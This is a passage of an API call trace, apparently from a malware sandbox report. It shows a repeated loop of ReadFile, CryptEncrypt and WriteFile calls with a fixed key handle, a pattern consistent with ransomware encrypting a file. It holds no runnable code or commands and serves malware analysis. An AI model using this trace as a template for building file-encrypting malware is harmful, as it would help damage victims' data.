lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.418] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.418] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.418] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.418] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.418] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.418] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.419] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.419] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.419] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.419] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.419] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.419] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.419] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.419] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.419] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.419] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.419] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.419] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.419] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.419] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.419] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.420] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.420] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.420] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.420] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.420] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.420] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.420] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.420] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.420] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.420] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.420] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.420] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.420] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.420] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.420] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.421] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.421] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.421] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.421] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.421] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.421] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.421] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.421] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.421] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.421] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.421] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.421] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.421] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.421] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.421] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.422] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.422] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.422] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.422] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.422] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.422] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.422] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.422] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.422] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.422] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.422] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.422] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.422] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.422] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.423] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.423] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.423] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.423] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.423] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.423] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.423] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.423] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.423] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.423] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.423] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.423] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.423] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.423] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.423] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.424] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.424] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.424] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.424] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.424] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.424] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.424] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.424] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.424] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.424] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.424] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.424] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.424] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.424] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.424] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.425] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.425] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.425] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.425] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.425] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.425] CryptEncrypt (in: hKey=0x2fa748, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.425] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, 